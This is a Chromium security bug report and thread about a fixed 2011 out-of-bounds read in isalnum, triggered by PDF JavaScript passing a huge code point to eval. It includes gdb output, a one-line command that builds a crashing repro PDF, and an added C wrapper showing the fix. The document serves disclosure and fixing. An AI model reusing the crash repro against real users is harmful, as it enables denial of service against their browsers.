
Issue metadata

Status: Fixed
Closed: Oct 2011
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Renderer crash with PDF at isalnum

Reported by, Oct 2 2011

Issue description

Opening the attached PDF document causes a renderer crash due to an invalid read at isalnum with an address like 0xffffffff800acf66.

Chrome Version: 14.0.835.186 stable (also beta and dev)
Operating System: Linux, Debian 6.0.2 (32- and 64-bit)

Note: the repro is derived from a malware sample.

 $ google-chrome isalnum.pdf

The repro still has a compressed section of JS, which in the original file contains a large array followed by some deobfuscation code. Based on the crash location I'd guess it happens after decompression while parsing or running the JS, but I haven't yet been able to decompress the stream and have a look at what is happening. The original JS stream does not cause this.

I'll try to minimize the repro further later today.

Type of crash: tab
Crash State: 
Program received signal SIGSEGV, Segmentation fault.
0x00007fffee977773 in isalnum () from /lib/
(gdb) x/3i $rip
=> 0x7fffee977773 <isalnum+19>: movzwl (%rax,%rdi,2),%eax
   0x7fffee977777 <isalnum+23>: and    $0x8,%eax
   0x7fffee97777a <isalnum+26>: retq   
(gdb) i r
rax            0x7ffff466c82c   140737293764652
rbx            0x7fffffffb6e0   140737488336608
rcx            0x9e     158
rdx            0xffffffffffffff80       -128
rsi            0x7fffffffb720   140737488336672
rdi            0xffffffffbe021b9d       -1107158115
rbp            0x7fffffffb720   0x7fffffffb720
rsp            0x7fffffffb338   0x7fffffffb338
r8             0x8      8
r9             0x101010101010101        72340172838076673
r10            0x3900000055     244813135957
r11            0x7fffee9ca42a   140737196631082
r12            0xbe021b9d       3187809181
r13            0x7fffea0b7cbc   140737120009404
r14            0x7fffe6f00b60   140737067879264
r15            0x73     115
rip            0x7fffee977773   0x7fffee977773 <isalnum+19>
eflags         0x10202  [ IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) bt 10
#0  0x00007fffee977773 in isalnum () from /lib/
#1  0x00007fffe9efab95 in ?? () from /opt/google/chrome/
#2  0x00007fffe9efb5e9 in ?? () from /opt/google/chrome/
#3  0x00007fffe9ee01c6 in ?? () from /opt/google/chrome/
#4  0x00007fffe9edef83 in ?? () from /opt/google/chrome/
#5  0x00007fffe9edf0a8 in ?? () from /opt/google/chrome/
#6  0x00007fffe9edf188 in ?? () from /opt/google/chrome/
#7  0x00007fffe9edf293 in ?? () from /opt/google/chrome/
#8  0x00007fffe9edf483 in ?? () from /opt/google/chrome/
#9  0x00007fffe9edf5c3 in ?? () from /opt/google/chrome/
(More stack frames follow...)

Comment 1 by, Oct 3 2011

Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals Feature-PDF SecSeverity-High OS-All Mstone-14
Status: Available
Labels: -Mstone-14 Mstone-15
Status: Assigned
I'll deal with this when I get back (next week). Aki, awesome if you can get a minimized repro by then.

Comment 3 by, Oct 10 2011

I made some progress. The crash occurs when eval() is given bad data under a few layers of obfuscation. There is a code point 7039 in the argument string, which is somehow different from a visually indistinguishable string constructed with String.fromCharCode. I'll post a better repro a bit later.

Comment 4 by, Oct 10 2011

Got it: 
 $ echo "%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (eval(String.fromCharCode(97,99999999)))>> trailer<</Root 1 0 R>>" > repro.pdf;
 $ google-chrome repro.pdf

Crash moves with the high code point.
Nice Aki, thanks! I was planning to tackle this today, too, so good timing.
Labels: -SecSeverity-High SecSeverity-Medium
Status: Started
OOB read due to failure to honor the contract of isalnum:
The c argument is an int, the value of which the application shall ensure is representable as an unsigned char or equal to the value of the macro EOF. If the argument has any other value, the behavior is undefined.

glibc takes the liberty of crashing for its particular view of "undefined", which it is of course permitted to do.
Labels: -Restrict-View-SecurityTeam -Mstone-15 Restrict-View-SecurityNotify Mstone-16 SecImpacts-Stable SecImpacts-Beta reward-topanel
Status: FixUnreleased
Safest to let this one roll into M16, I think.
r1140 on PDF trunk.
Labels: -reward-topanel reward-500 reward-unpaid
@aohelin: interesting bug. It's hard to rule out a bitwise recovery of the OOB content, hence a $500 Chromium Security Reward :D

Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
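The ctype contract quoted above is the whole story of the fix: the argument to isalnum() must be representable as unsigned char, or be EOF, before the call is made, and a JavaScript string is a sequence of 16-bit code units, so a parser cannot hand them to the ctype functions unchecked. As an added illustration (not code from the Chromium PDF plugin or from anyone on this thread), the C below wraps isalnum() so that out-of-domain values are rejected instead of reaching the library table, shows the single-byte variant of the same mistake (signed char), and runs the wrapper over a constructed UTF-16 buffer containing the code unit that String.fromCharCode(99999999) actually yields (fromCharCode reduces its argument modulo 65536, so 99999999 becomes 0xE0FF). The negative test value is the sign-extended rdi from the register dump in the report.

```c
#include <ctype.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

/* isalnum() is defined only for values representable as unsigned char,
 * or for EOF.  Anything else is undefined behaviour, which glibc turns
 * into an out-of-bounds read of its classification table.  This wrapper
 * keeps the call inside that domain: out-of-domain input is simply
 * reported as "not alphanumeric". */
int safe_isalnum(int c)
{
    if (c == EOF)
        return 0;                 /* legal input, but never alphanumeric */
    if (c < 0 || c > UCHAR_MAX)
        return 0;                 /* out of domain: do not consult the table */
    return isalnum(c) != 0;       /* normalised to 0 or 1 */
}

/* The classic single-byte form of the same bug: plain char may be signed,
 * so bytes >= 0x80 become negative ints.  Converting through unsigned char
 * first is the idiomatic fix. */
int char_isalnum(char c)
{
    return isalnum((unsigned char)c) != 0;
}

/* JavaScript strings are UTF-16 code units, so each unit must be
 * range-checked before any ctype call.  Counts the ASCII alphanumeric
 * units in a buffer; non-ASCII units are skipped rather than looked up. */
size_t count_ascii_alnum(const uint16_t *units, size_t n)
{
    size_t count = 0;
    for (size_t i = 0; i < n; i++)
        count += (size_t)safe_isalnum((int)units[i]);
    return count;
}

/* Constructed sample: "a" + String.fromCharCode(99999999) + "1" + " ".
 * fromCharCode reduces modulo 65536, so 99999999 -> 0xE0FF. */
static const uint16_t sample_units[] = { 0x0061, 0xE0FF, 0x0031, 0x0020 };
static const size_t sample_len = sizeof sample_units / sizeof sample_units[0];

int main(void)
{
    printf("alphanumeric ASCII units in sample: %zu\n",
           count_ascii_alnum(sample_units, sample_len));
    printf("code unit 0xE0FF accepted? %d\n", safe_isalnum(0xE0FF));
    /* -1107158115 is the sign-extended rdi value from the crash report. */
    printf("sign-extended register value accepted? %d\n",
           safe_isalnum(-1107158115));
    return 0;
}
```

The wrapper deliberately answers "not alphanumeric" for out-of-range input rather than truncating it to a byte: truncation would make a non-ASCII code unit such as 0xE0FF look like 0xFF and be classified by a locale table it has nothing to do with.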

Comment 10 by, Dec 11 2011

@scarybeasts excellent :)
Labels: -reward-unpaid
Payment in system.

Comment 12 by, May 15 2012

Status: Fixed
Marking old security bugs Fixed.

Comment 14 by, Oct 13 2012

Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 15 by, Mar 10 2013

Labels: -Type-Security -Area-Internals -Feature-PDF -SecSeverity-Medium -Mstone-16 -SecImpacts-Stable -SecImpacts-Beta Cr-Content-Plugins-PDF Security-Impact-Beta Security-Severity-Medium Cr-Internals Security-Impact-Stable Type-Bug-Security M-16

Comment 16 by, Mar 13 2013

Labels: Restrict-View-EditIssue

Comment 17 by, Mar 13 2013

Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue

Comment 19 by, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 20 by, Mar 21 2013

Labels: -Security-Severity-Medium Security_Severity-Medium

Comment 21 by, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 22 by, Apr 6 2013

Labels: Cr-Blink

Comment 23 by, Apr 6 2013

Labels: -Cr-Content-Plugins-PDF Cr-Internals-Plugins-PDF

Comment 24 by, Jun 14 2016

Labels: -security_impact-beta

Comment 25 by, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot

Comment 26 by, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot
Labels: allpublic